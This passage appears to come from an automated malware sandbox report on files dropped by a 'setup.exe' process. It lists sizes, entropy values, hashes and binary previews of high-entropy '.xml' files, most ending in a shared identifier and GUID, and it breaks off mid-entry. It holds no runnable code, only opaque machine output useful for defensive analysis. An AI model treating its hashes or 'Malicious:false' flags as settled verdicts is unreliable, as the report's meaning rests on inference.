              SHA1:44C7C1190CA10B90084828A01F8EA4AD36AEE5B9
              SHA-256:6F6440ED566872DB78A1EDB72A7F12D9CD58C98F7B9E2BD24B1CB56274A71FF1
              SHA-512:76C19F4A8D926054DC305552B150E5A645E882609BF4970BE04C122A3F12B379954496FE807F841E6DDF563CBE6358EE464DAB4FBC48DA5E0A6097BCA94B5535
              Malicious:false
              Preview:<?xml,..@T.$.../.n.I=6{..Y...v.I.iK.Yr....q...n;F...'!.7...t.:.J.^s.....kT.D.......).(..)X....''..mX<%Z...E\..n...b..P....,q#..:...)<Z...;>X..Ds...G...A...*...|...B.................r.\WQ...b.....b...t..h.c..n.....L.......-!..m.X.J...~ (!#...[|.a.K..Ce..v.....Q.>./".+..N.D..V....|[..Z...6.+X.H..n,KG..|....(.l.....N..z..q....\q..t....V:.X..z..2..~.~D...P..{$..^.....0.b.O.,..........M....`....Dh...l..\?tEK...?..Y..'..tl..n....EF...N.......Y.#5.".4.U..B.m.......q_..;....X.....CS.......!..Z........g.g.O..l(%.....tl#.....L.J..........xC;q@8.#..d.....L..i'...H]6......q!..%.....$Q9\N..%RY.86.C.G...B.|&...q..<.P.q.P.2S...t....]..o...=S@.fVR.p.%t....#vr....V.....G.9..p0o.e..Q..=.p..\R'0At.........)*`m.P.P.`.2..O...W.[Y...\..........H>.|.G.."I....|l*..z.O..4._...f...t5.az}..s*5_Y..r..'.u.$.];&\..)...k........A...._..X..F-e+.<..i..h..|......[..@.A ..a..c...;.MF./.Y.,.i.I.....{.OG0X..+....X...=...9.O.Ix.o8V<...MY.......#...S*.p.Rg.Kn&.|.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2461
              Entropy (8bit):7.922040635950204
              Encrypted:false
              SSDEEP:48:SOlyv4q8U6hPSRacoK1FrveIxN73eflatxqwKj6noFzEZ1ah2w7sYPSD:rQ4qDoK1F7j/ONa/qwKtFwOhpsYP6
              MD5:697A4961ABD10A4532425F860F9B6686
              SHA1:92153C2657E6FC7D08222B0A13821878A7966ECA
              SHA-256:C109B08BB42C4F569A07AEF793E8185AC9EC7D1046F8F1E042EFCA0FE7AAC1E3
              SHA-512:F5726ECA946FCEC96D9D04F2438C4F9223E4003F1CAD93F610CD69B8207440825DA81D220D2B9A856C67F1FFBC1C135670953D538DA3AEBFE98C9EB17D58C39E
              Malicious:false
              Preview:<?xml....u..fE...{....[...}..2..J.q...yW...k.$M.8a........g.....=...;..."..[d..]f..J#...)E.7WkS>M..}...h..N....B......)=.....5...U.u[.f;P..]0.......-...%..@V.m.@......)....a.c..H.~....y0.,H..T.....K...%.s.{..m.b.. 1D.....T...=cv...9.....y.:.d|...O.d.JR.M]........x..f.`.......J..o.w.>0..K/y4>.....h4.5^-..w.-Rj...._..|-...vP...4.m...#v|.C...n.b;.%b...<..L8i.?Dz<.U....2.....B..G..S.}[....d..2..-.yq.\.....;..4...>..<...;x..8HV....uM.:**z .lw....?......zG.bi9I*.._......w.....9.S{)......q2.{D.<..1....t..l.St.q...T.Ot.....mW.>E......@<=.*...x:.u..yPc9.../g....0..Z...c...F.\...Vj:.e.:g9C_...tyx.!.....E;.......l..V#"..".L ..Z.!..=..7....].,....{.c..Im...Z>`^g.(...L`...V...;.kD.V.}l\|>..V.Qm.lQK........>...-.`nTCu?..@......R8L...B..U..#0..)..=..xZk...@T.{.....a.....g29..*.......:T^f0....P%.^x......#.....Qz.r.<..JX....oE.K../..\PE;....._...l...R....g,...Clu..rp..,.qG.;8.D.y.Am.Q....I.r..M6..v.$F.A..6.K/P..}...f.m...\..*_D.1.....1....$L....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):758
              Entropy (8bit):7.732775145908101
              Encrypted:false
              SSDEEP:12:WWrVwUkVZSJG3d8RIzlKt2/VajWIWtbFcrQoKsnmOFFek+WsYM+XD+lXElREXp5O:WhVQOzluYajWrTcrQojmOF1Fc0laX8TX
              MD5:F6A0B92B9E6CC3F881F1EB0B8D6DD6F8
              SHA1:1ADA9BB05C3793E8E699127CF3E1B03D47DFC775
              SHA-256:46024E6922107F82C5636272601EF9FE31CD2C0BACDAEABBDB04560DE32CC453
              SHA-512:1F31FF982F9B35DE05A5CD78BAEB7C3005B9EA87004CBDCF5A8FB108C3BF87CBE92DA1CB25E3BD723B89F93F146B5888106F1FD0DE1538C6F90A479129C99D69
              Malicious:false
              Preview:<?xml......q.gF.ll\x.].lc...+..Y....6W.._...|^f...rx....N...8".jp...Y...r|?\0.WR...1.....d..=@.".<K.O.....ee...S..&....R5...&..d.-...t... .X<..V.I...1....A.2J.wi...r....(..t.....K.]....r...O..665.Z.n.....p.o..RZ...P.h.....l.....`!.6....u..&..h.S7.*o._....\|.Av...nJX...i....s..~..S.,..\.r.P.J_............{.v....c+...........oz.tA.5......iN..v#.e6....qi..t.........{.C.~.)..}Y.=.Ian.2`...Eou.p..L.DMo......P.Y=.H..WnMuz....$mV. .).....(../....M.....;>c..=.s.8...j."&.....!..BC.(s..d.0.|..../J..j.O..r..vF..v...".b.#.jut..G+.4r..X..!..FKW....{....Y......`...f."E.v..~....a..t6.c..-..2Y._.^..YdgCGX.....*>>.L.o....9Q.b.....M....&.a.p.....0..D...q...(VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1210
              Entropy (8bit):7.833991639469542
              Encrypted:false
              SSDEEP:24:AKsIfCfSl2PpM9RSNxb6ZDFNmkG750/af2AcwpYfHaDRLmdivDY88mCiKmI8bD:AKsIfCfSloYYwWd0C+Av0Ha5rvDbCi/N
              MD5:D1882EA9C0F9B6C0624416792F235B93
              SHA1:5B404940CD856D85813FC3CB8C18EBD181FEE601
              SHA-256:F6D92E701F50C5EC7AD0C2C837B29BFD6BCEB9437BCF26BD9FF437BD24200AAF
              SHA-512:5B59D3A2E2690BE969431BD83416BDB4A11E1A196B7A32259754E4F7A3BE8C5A6FE2EFD0F0AE5C7188103C2C53756A60CB636EED75CB77EE1028D38A8FE82BBD
              Malicious:false
              Preview:<?xml.`Y.s.[...p.N...(:..=..}..w......qdz0<...@.......C....^...C...0;...#....m...<8u...6.`u;6..6 .?..W........[..Y..:X.y5..8.....bL...*L..oF!f...T.DX.M\z.TW..HAmd..2..}n'../J.ny........Q.N...m..j...5.R.9.....h6..~V.{&*m.&7..G2.=#.B..p".92../.A^".L....jOn...9_...~.c.WaIH&p?}.(.U..a.....F.<.\.ii..&.S..R..5!:..e....W.Y.KMCT..;..R....EI[..".xW.d%.f.o.....y...~......{..:.6u.*.....B.Q.;..J...YoE....,C..o_\...7,...B*...K.\..r...t.).:....r....J...f.b.bw....xF..{.~b......rA.~.jP..V ...!.../o...!..7.b`....%...n..=1......^n...T...m&.O+?..`Xr\..qa..Zz...+...;1..!...we....G..wu....}..37g....2{.'.1;r...so...:...Y..}k`...wL>.qS.;.!.GP...'..i...T..\.....(.p.{......D4.^u...*...qW...9...~..KA.<..:f....W..UoG...F...f...9...8.9mefT..T.7..6.o.x.~..........g.r..F.....,.).J.,..C5...P.|/xR.pj.r.."1....*..fJ.....c.[tP....8.@..T.....,~.-.ah.4o.....|.T]{.hH.Kd2.........&.........yrP...3....R)78.)..\#.....z.t.D....2..LL...}0BoD.$."....2..O.-...1.'...V.I'.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):537
              Entropy (8bit):7.487445366210089
              Encrypted:false
              SSDEEP:12:OUphkW6EPLo8NaDZHnKYsOYFX7KYqHjbtOXQsMR2cii9a:OULk6c7DZqYDYXMDbtWpbD
              MD5:AF3C47ACCC23BFB56799BC3B46F87042
              SHA1:9ADCBD07AE660BE963C66C00458721CB51CADF70
              SHA-256:2BC7E6651A35F075068CC4829787847BF0B129166BB71CDE60F614E46F66F3D5
              SHA-512:DAF5B1C34810BEB174D276FFA73BF858A242063036FF2CB534837F9784D289A208A489B9C89D78DCE19E21F37DA6C59896E20960F92CDACA3D4A2C50B93F77FD
              Malicious:false
              Preview:<?xml{.......HP..E.`.T{..(j..0.t.SNc.].H@.z./.k...R..6....t2}......73(R.qHz.+..J.".a..........f.{.6..,.Lp.......<.....A...8.e......@0.....y..gN6.............N....CI..J9......J.H....[(.....X...a.....H..j..t..\.....D..8ee.ov...}.H.q$...!.#..>.].....T<......n.=\m.?.Q{f..{..A..'.%.yGn.{..E.....H.0.JeL....E.....|EQ..j..-......Dm....>.9cr..`....i..R..:...\.5...#j...N...M.=....I..6..B..%L.R..`mI.7...4E..1..\.....?...XC+./....]..]..]l.8A(d.l..U:..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2493
              Entropy (8bit):7.9186191019782335
              Encrypted:false
              SSDEEP:48:c3H96YkGHjnq/ntmeGHL2MKuDWc/4++5Bx3oECuwhsx+j+d2PxJnqEztnweD:c3d6L+jq/MH7DWc/gV3aGxytznDztwm
              MD5:64305C93443FDCF8B9AFA7F08F2C8BF1
              SHA1:ABD8B7F80ADE36B9EA2941D07BB36C0757DE6219
              SHA-256:BDB437E9CED2958200622280CA2D77135CC8D87F5032C3DF1C2836DEF6E32BBF
              SHA-512:C11FD851A211C7CBA149AED2CBC8C91395DDA04493B41BDF7EC2159A8F7044F5E476D438305C31A33A69FEBF1E1B184349F1FE2368A5FCF97AE35F3E047931CE
              Malicious:false
              Preview:<?xml........z.7.&...V.u..7...jRJ....0%.,C.}.........?Afkq.....w_..iE...f..W....j....S>...O;....Y.....eLO0...(..2.YD.!..{.x}.'2F.....B..'vI..I0.....<...\.d......kS.P..'o#.[.f-.....0.............E-..].g.d..X....T{.}.i_..a.]I.*...'.z...{.N..Z.\....u..H..q".b|e..D.-~Dl(.....Z.+.Q.m.j..1....u".N../.........t.$q..!8S~.N+|.....:......W.^.h......AR.4..C.Y.=%p)I....G...M....._..y....7L...(5.d...W..[.*.].:....._. J....P......,.....d..u...>.D...s.....`.K9P.D.......%....!J?...\Y.....g.9e#lCZ-.B.........g.z..D......;.[..X/uy.....ggT.G..'M......*/....O.,D.i.E.O....2..}z.6..9/.K%..)..on....Z..~b.7j|=....3W.......wa.W..`.B.k.|.._.)..;'I.#.q.....I#.B....n...a..TV.t.\..,..>..tu..#F.p.UZ.b.../.g....$....~..Af..u....Y..I.....K./V...fkO..Du..[..4..O.....IL.y.^z..Udd5..!i......%..$.....o3F})\..rd-..`........HY..#........o.!.d.4...:.p'.`..../..D.w.Q...$5b.m.......r.. .a^.}.9E.k......9....0..'...rnV.p's#h'.wx-..s....I.d.Q..^...7.....$..?y.#'.t.7$>I.D}u.h..q..:1.`..#....j2
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):741
              Entropy (8bit):7.699609543649894
              Encrypted:false
              SSDEEP:12:XqtuxWLV6Tc7BsUExfDSfPBu5i/GnjEOadzAtKvO82W9ywdR3s5iDuLQzIon5sMS:X9xWcTc72d9DCJu5znjEdzAtKvODAygg
              MD5:DDE5D1FF008B81A4B7460D0903EC22F7
              SHA1:062B003D855D5FC3439DB7C0E8051C9CAF3B9CEA
              SHA-256:EFCEB1CD4A021590378381AAE32C32D9BC9DDC54D81781DFEF4F17C655D40721
              SHA-512:D46339FD4F2C7B569854BA8AD472FD90ED6C2FAA3178AEC3EC0F05FAEBE45586F064A447CD68A17166C8C242AF1E82967FB0813981051A850155D7B533C198D6
              Malicious:false
              Preview:<?xml.....M..;...c.|.........._9[....E..:..m..[.AWA...F..+..;..FC...f7.1..vu.U@.<.m..Q..t/.=]..M*1.vL..|y..aJ..4.4._.l9....X5..A...N.....y...."8...i.U..._.q.{..2E.=.u}|y..jjDc........Z.zjvz,".g.y..f\......E..|..Y.|..d..1.zPL....r."X..2p..`..\BT.B......_#.....z.[B...{R8f!b!."g....H.=m...I.W....r.tl$......d...hG.n....5".O....G....$..N......,g........W...".a....>.F,.#..9&.z...4c....h.I..g.H.c.%...<...!.v.B7.8. ;..&......N+.P.!.N.2..<..;[G.....>..c+.?..g..no.$.01.I..L. x<..s.....=.n...%....."g.c(...1....&;.~.I..J'_W0.U.r............... ...{..D...A@..\v.<.....8=.q..W.n.k.H[q.y...!0W.Y... .e....-.Np/..M...9....X..S~........... ...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):807
              Entropy (8bit):7.730428594577371
              Encrypted:false
              SSDEEP:12:KnTXDbRhGY+DnBEaZfb2JwJlrssBAayN5Dlm8dRJxgV4lshjIsMR2cii9a:+bSY+FEa4JwJeSyNdljTr/shdbD
              MD5:FA65CE5124B7969472A1A9BFFC5CC0E1
              SHA1:24C43D0DE7AA07FFC6F817C3DA887B49308CA998
              SHA-256:8BA4C2380DF4501C161D197586B9756E703239AB33DB0E637C426DC1F23C927F
              SHA-512:9D97B64F767503496C2F97674D9AD36E6C1E102FD7D3E5B4C3D31A333028549CC598C4E6CF1111E2926BA2C57DBB5FCC7B0D7D3BCC6DC3ED1C3417B68D671886
              Malicious:false
              Preview:<?xml..;...~U....e..uEQt.W...Tg- ...%...w9-2sl%.}...XK.u.._..(.:.TH=...a.4..2....,9.e>c............#.....v...wO...<..9..x!.n{).T+.i..tE&..D...h.....mo.3n......._....S...j{)>.gL#Xv.e..A....H.O.sb2.#._c+.d.U.O.....n.X:..j..lEZa.2..C|u...l.A..2.{....Z...........|........E.:+......w..rd..T....D..<*A...&..j..>.m}.....C8..j."BM2S.b.....5.,..,S<. R.sIJ....|.......h.M.R..?..E....'.Lk.v.J...N...)b...<C6LZ. ..!E|..[F,7B....N..?y..J%.E...?.Y4..I.'|........,9.q;......`..d.`..r.....J.7MgC#[..f3r...E..A...6.$.UM../<*..#w...)........Zr<9.(.u..#.....M...~`...jj.~.....l..h...h..F`4..b..~....J.)!eV......2E......C.!.g.~o...s&..W.._VQ....c...#....yH.q......o...Z.n.&....B...mt.]h....>.u...{-t...!.+...09VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):748
              Entropy (8bit):7.717630389403284
              Encrypted:false
              SSDEEP:12:T5MIYel1SYbXOBeJjh2m3vjJ+AyTl3TDucQ6idZDLURJbjAH6Z+QsMR2cii9a:9MI5HTu84m3vdpddLURJY6Z+pbD
              MD5:8B1D15D5D3BF9BFFFEDFC3B79B7F5DD9
              SHA1:679B43AEDA00A2C69C04C02EDDDC123D83448F79
              SHA-256:5E98FE5FCEFBF96B9836D1C57656DCE4013DF4AB279E1939A1AD260EFBEEA836
              SHA-512:DC5B9529DE680488A386CD7238F23E9193049AADF451917A8FEE1C7CD76AACB673EC0ADBB5E29A8C5F2DF50FE4D8A02D6152D2DC3DA100F4B4CAEE191AA4D4F0
              Malicious:false
              Preview:<?xml...OL}.]..$s"...._.._UB..'.?A.u:..._/.. .j.{.1x.^..H..#..Y....8.>q.b...H;G.P.E.a.r)@..V<a.Z.G.@.0 .h.{.n5..v....t.*..ks........>lU..%..[.am.iG.o.k......a.b..&}.U....n.....A....Bs_.....(o..b[yo....y..<..;.;5......R..z..g.<lt..z.R4.H.h5^..........x...NdEkk.U.!&.m.3.o.u.,..&DwA<..(*:.9D.g..'.E.4.uaM.J....:...EEm....G.....c.OR...\.....9A....z]....$.U..Z.m.H..<.f..ApV....P.u...he..6&S...dse.......{f!....H.....q]......BP..@....d.~...g.M..|...ra.3.~.....Z.vw..u..;.O.1/ie.E3.....`...JU.d...R;.mG.o..ug:..-.....=y.\R.e<.....{..b#5...6.....U.j=.....z..L..YR...,..X.Q.h.%..{ZO.#....![...(`.. w1.*Rs.2..)%.d.c....[c.,.....~X..9k...K"..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):804
              Entropy (8bit):7.704864089665267
              Encrypted:false
              SSDEEP:24:ZGlN+sRMToRu2Q6F8IIc2hPoOFjenkc2xgcvbD:ZyN/BJI5PbkMjD
              MD5:0FF370A7DF895B08065ECA32E82614BF
              SHA1:A2C9FEDF3DFA01790A510FF9F61EE420C1F9F1A4
              SHA-256:94B78E439C73B62CBC5A4E31CF20A2C6767B345010279F2E6C72C2FD494A5619
              SHA-512:91674D9E4E2FD139CCD635DE32A97D544917560A058030D8EF1DE072D869F4B4007705185AFE376088ECF4679FB27B623758B30F4571A9078177CEB04C56D4A3
              Malicious:false
              Preview:<?xml<'.B.......dR.^8b.|..G.J8..*4.8q%.....j..wm.._y...`q..e............xf.;.q]n.^..#.u.........o.LU......4.YhJ6;...<.sf.9....!u:/..;x..l..wi....f..^k..[....o\.......hk.. .......?v`+.P..n(..4.}.|.=..../.}.Ef...}.....A uE8..X2.O.9**b+...."...Q.R.]wg.....!|Tg[6v....'N6...Z..,...D...*.q.W .R-...I:f........I..s.&.(..z+5,T.....{p.../..]6.......:.l#...=..#~...0...b.O..8.iU..!e.NAy .J:I.y.'G!.4(.....F...nYOQ0.6!3.c...WZ..<t-u.kk..It.&Vp.....5.Kc..^7.z.hf......T...OE....P.c\S.#}........U.".L..z....}..."[..[......(.'..w.z.?.b.Q.M...B0..%...mp/..B...../..y8Y.....*.[.?.&...[.N0.s.....o.....zMS?.....v.XX#i/5q'yAY.ZcA...0s.a8.....?...E..;5........0z.6R.".=5.Rr`.....D...{..N...*..zk...[..........VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):965
              Entropy (8bit):7.794602460029411
              Encrypted:false
              SSDEEP:24:gDILgcXILtzg6KPWB4nm9x8cN+TBdrmAjrcS2gme0YbD:gIBIRzg6KPG4nm9x8c0Vdi+rcS2E0CD
              MD5:DA41DA25F61FD326FFF7753AEEE7F825
              SHA1:2E50200372BA2CEA9B1907D1B9AF883DC0EF6142
              SHA-256:5C467C560FF5693DFA354A260DE074146D210E691DB6452F929DAAF7C7298161
              SHA-512:74BC4E47F6EA4A14910E502D97E1CA12F8FAEEF920714AACC80B1FE9AE238604B3CDAE207196AB3F2C9792926007A4AC589A40F3359888DDB0C26A1D7350B1CF
              Malicious:false
              Preview:<?xml.z..b.Oa..cVyp..j`....F...]E............7....U"ueM.v.iZ.}@f;|.(*.tb...[...a.J....d..pIO\o .^.....b.^.f..9.fE /.*.1...P.v.J....+...@T"..Dl!Rd.;L.MR..~...t.Q|.<E.(...r.7.O@....>...5..........7jC.J+u.^.9...S....|.D...qzd=s.T...1!"x..}&......^v.wj...i.J.].0#.c'..T.?......./.$W".......!....>|..N..... .......K.B......=.......7...;.}..%...v.[h.1G....).....o;P.......XxW.....Z...v....V..u...X...w S..c..n......_.n.@.!...T.......\...P..T.Z.W.}0.s....-.(....U..S.._4...5...Z.......; .C*B..&..H..$. h?F.K8%.)&VSq.xq=..2..zt .].....v.i..)..3:....*.~.f.[.j.F......`i..RKO.Z.v.o.Z^L.E..f$.\...%..W.)re..1...J...F0..d3./'.........E..GPx..U...W'....N.....M..g..n.6hRc-..~..qz'.Q6..|.q@.........1.-....G.....V?(\..Lz..7.C.;.yx[.....!Db..5..... '/......../~.....,....U.....Z.....9_.?.gB...$..Wk'....IQ.2 ..]..N...E;....."=.+.=.8...w,.Ok.vfT.<`..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):800
              Entropy (8bit):7.729562653202849
              Encrypted:false
              SSDEEP:24:AgaP/RjC8aMX9CLm/ywVQ4/x0uRzFYiWTnVbD:AgiOsYeDV70czXWBD
              MD5:28C346C5B85236A8A6CB767D5156BADE
              SHA1:313816E815E97097A5D581C0F6F7CD31A8BA9BB6
              SHA-256:6D9ADF70A60EFABB82F15E2B8D433D31FC27BDF76E9E19A0E9231757329B57C4
              SHA-512:3E3A32774F9AA054063436699F1DECD15927AAB92E59186C85B0BDC5CD9CA11F7D73B838A7EBC67D69B9E9B09AE5EF13F5053FB4759751CB879FA1B0BF04E74C
              Malicious:false
              Preview:<?xml4X...W.(S[..f..^.....J..!....>.;c..Fy..w.N.PKXB.~...C.0..._......"R....G ...N......]M;;.-.]....*{.."....X..h.3.....)2.&.|.9z....H.p{...,.q./.^.......A...;..0...-;..T.1?..{.C.w#.6.`.o2^..... ..A.G...J...M.~.9ny..(.J...B.....#I..N..a.PB.-..u....;e...ag...B..<..Ub....v.q.U..~,.....^.h....2Z.^X..M.e+..{.......9nD.........@..`...M.p.L.s...V.... E.>......T..V....Dz.G.......=....Lx......r....r.q@.f..._=.N.<..7.OM..g.H..+CH...:...].l.J......7Jw.R0Hp...PVh..#I@....1.b^`.6."._aG.]p....e.......L.hzui..MF...[2..P`;c.........6.7u\.+P.T....M.Mf.{B.....".m..'.eU...Q....a...B...R.'t.c;..r....y.&.....*,.)....DY...._g...0....D..>.G..V.=.nP.3.(...?...Z..n.8.*.....k.J.:A.@>.75....Q.._..*.%VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):740
              Entropy (8bit):7.667172955656235
              Encrypted:false
              SSDEEP:12:0C/dJdntuhNUk6sD4bEZynGaPL7LJbXcibi4H8bIh+zGFKVslzwQ7pZVmmm0BACt:H/mcVEAPSbbBK8sWQ7pZY10RhdlbD
              MD5:B254B0ABC54AF3AA000EAC40725E6FF6
              SHA1:98E337A4DF52B8619D5BB668A33504086EE22DFE
              SHA-256:C2FB8F9C2646EF3E3FACFABAE8C97047B5D1FEDA9381D3D395B5DF6FC963B2C7
              SHA-512:DE43421566699076D7CF55D35D29ADA2968B96EA02F4B5971054B9F4DA4DA475760238FC2A4229847423F314BA0AFB0C471E3E2680ECEA467A3EBBFDA327A8DA
              Malicious:false
              Preview:<?xml..:}3.J........h..$vi..'R9....#....|....N.!!.......(.d)#.....aT..z....<Hg.1b.H..nv.<~..4.....en....&.:.........t....}._MU.....R[...........'.F`ox;...ij\^+.T2.P].jr..v.2..Z.S..C8 .....5...L.B.+..*..%......$a.*k.*.s$..J9c.C..BO.S.b..g..t;.#.B.z..\..%...N.....b.<..mM..!.dIXQ.....Z..5OW.e.0.^1T.eq0f....dS-hS....b...........O....t.h....A...z..o..MVwq..)..hY}..<.R;. ..#....T>...F$...`../......\Y}L.k...~.....lbO.....?....2....NrV.{........ 4q.Yz......>r.|.nGM..;gd~yPE.i.YV!.2.j..{...UF..h.c4N....<.?TG..d.^j....N..q..w...........a..7.r.......E..g..E.4Et....N..?.!t.2._...v...U.X..N..(."..0qA~.|I_..~`....!a!.$.<..l.....[.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):819
              Entropy (8bit):7.709439875048564
              Encrypted:false
              SSDEEP:24:3Krxb6XHvxqpCPnKOfIRkbN2LTQ1i25nQl85bD:3Kl6fx6cKOgWbN23Qo2i85D
              MD5:F353A58491DB686AFA581C6D3DFD2C54
              SHA1:A5B1AF17A6627848E2E2B00B0C8C5CD3F1D2ED2A
              SHA-256:000B2E35B7B8FBDE17F1A9041CB9C5B072FCF87422DF9CCFEB5C063CAAFDD0CB
              SHA-512:ECD9C2D031312E33B045C88E79672FEA5E530BECB37161064173E4CF1889EEC49CFE62FB84168C8BBAD52A0EEC271E79D8E362C562A4D6EA1E84A66724289AEA
              Malicious:false
              Preview:<?xml.O.!...%c%.....r...Um.m...."2...t..(...$s~....t..z.....p.oX.8.3...cI....-..ig.......F....M...5.`.......X._..!..].{q.=..^....6h].V..jC3.}[..!bT(n.Z..-..j.IG..(...#gU4..c.Lb...Xo.5:.$.B..3.".i...z...."pU`.. ..xWxp....kwJ..s&...#..7f.J.W}.e...y%7.mz3~...l...c.R...f."....J}.....7\..........UFH5~l.....j...p.:....v...w....I.....$IT..+G/.....+..9U|..-.Ii...P.@(..f.K. ..`.e...q..%.7...J.....W.d..5N.>...w..io....+tz.R..I...;...<..>L..-....E.....Q..&..g#Q=.2.=......8.....L.!.2oE.....Q;.......0FWl|.....U..#J|(.h.D..bQ.......Yu..Q.y_../.gs.N.O.x.,q.>n.I.x..$.........i.u.......<a.^i..?+.sH.......p!I.I.6A.i?..6.J3.4.X#m....[i?....1=...c.Bm..x.Z...-qU..._.2..kaIl:.!#..5.`.0.......`..$.r} ..2..k...}.@Q......h..ko9.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):760
              Entropy (8bit):7.71550517310955
              Encrypted:false
              SSDEEP:12:c4ti9HMbKxcU1EUq9x2l45pIKjB/K2QF8nWQRHRUzU0rP4ngb4m6JNVbUOYXGNHX:esbKeUCD9IAXjB/KUnWQRCzU0rP4gb4J
              MD5:ABDF364D1F0ED77E2D7930A819642143
              SHA1:157890E07B225CCB700EAF4A52CCB4D5B0601085
              SHA-256:C7CD36A9FB3C23A7EAF9164738E22A96C554A6126B994E288402D24BDDBE4E2B
              SHA-512:522B335E690EBC2618C92C62BD0B593B60EA776FC3C5B90064CAEE35A7423678670D0A998C4F2098037528620E09DA64ADFA47B2C8E95C686B099E2B9EAF73DB
              Malicious:false
              Preview:<?xml.'......29jh~.....p.._..#..X.<....k.....Dm._&..V.3...........&..-..T.>..rc.X...+GP.k.I...{a..;.....c.Z.T7'...oCjk[.Yz..U..p....O.`.).m...."..'.u......1!......ks.h.*..~j..}>/n..S...}.0.G....AE;..5.g........i.q..G.0..!.I.^.+=u%g...'_.......*...n.r....n.3"5`vY..$..g$...d....... .Gy....M.tp.0. ......(.Y..tLo..P[oy{..K|.*...4....-..+,..Mw..zW .@..E[...u. ...}..+...;.g...\OB.U..G.m..z...+J..W.e..;..t2w2P@..b.o..Uri.9q+..y0u.h.c.^an.k.{.!.o...4...v...\D"..C[".j........jdu,.pWe!.zx.I......[....e..;..d@L.)........QL.]hL.k.G.....0l.IZ...s.+.@O..Ks..Q.xq.C...%...2{~.6...H{t`...r".....%...[....E..W...e.HC....;..h.9.E.k."..-$....Q...SF}..4..c.W6.M.=........VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):819
              Entropy (8bit):7.757317894855538
              Encrypted:false
              SSDEEP:24:hKq/bt3+e7s5uncPYOKFKyolAbIM6024k/yYG0JNNWbD:hx/pue7sscPYOKgyo2bIM6X4iGRD
              MD5:F2FB28103F940FABECF25C1A32002744
              SHA1:8A96901F9E263C2AB32194872D0554C4ED6DF5FA
              SHA-256:033FF0A6396A2F82E19A39D9FE558B1CD42258048DCDDE4D2CF9FEB44101936D
              SHA-512:783E2E2599B9C02205222E4D92C8CE685994EA7345FF7476DAD1788D736D477B01344360BEF64197B951224A08A1DC441117D553EB0839CC864482D48EFFA5D7
              Malicious:false
              Preview:<?xml...X.WhF.<.I...._..'S4>...L...q.pE..../....C'._.cza....a2.R...$P.......Eqnu....e>^..2.m..kDg.<..G.v[......`.H.....^w..X..mD...NR...c.Z..h...v..;.?_U....4LoYE........Kh.......-O...z..5...~.8.Op.&..^d8..QS}{.P.......ih.l..E.#.....;...].4+6X].....Nc..1S.....f...^.c..<|.Z.a.G....Y8.k!..vG.`....;...,kz..gc..<..l.i..i...K.....%{..e~.v.../..{..KVi.O.W...>.r7......sS.S..(...$.W.1.....m0.X.r...b......2AuT.G..2.Ml....Z-.....=..K.....[.2&5..x;..A.SYE..2..@-.^..._...)H.lW........\..2.|.TSD8.........|....:.|li..:.6.-..R.7j...BY..|]2We....u. *T.O.@..bf#?.'..Z..d.h...(.,VJ..Q....LA.X..:..pW...Zr...=.O.....%..s...E2[.....Y.W.ad.........bH...QP.....;Q<.".h.?..s.`........0....8.Rg.y.$..W..]..ZK...s.K..h.e|+Py...{.Fvx..'..`VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):740
              Entropy (8bit):7.750694979026036
              Encrypted:false
              SSDEEP:12:4b55IJQwO9w7AfaGciUPauPnCoSnVqL9/hTy5vH22nH38RsMR2cii9a:4DI+Rq7/GqBSnVqL9lyRnHfbD
              MD5:09EC836C1FD29B5DCD5568E9BBD263D6
              SHA1:6ACF4F95261CE4E9DD22764C0C77BB15D66529CB
              SHA-256:C471391D775A678F0B5275500E4457C92500DDFFEEE8158B910A2D8B91212E2F
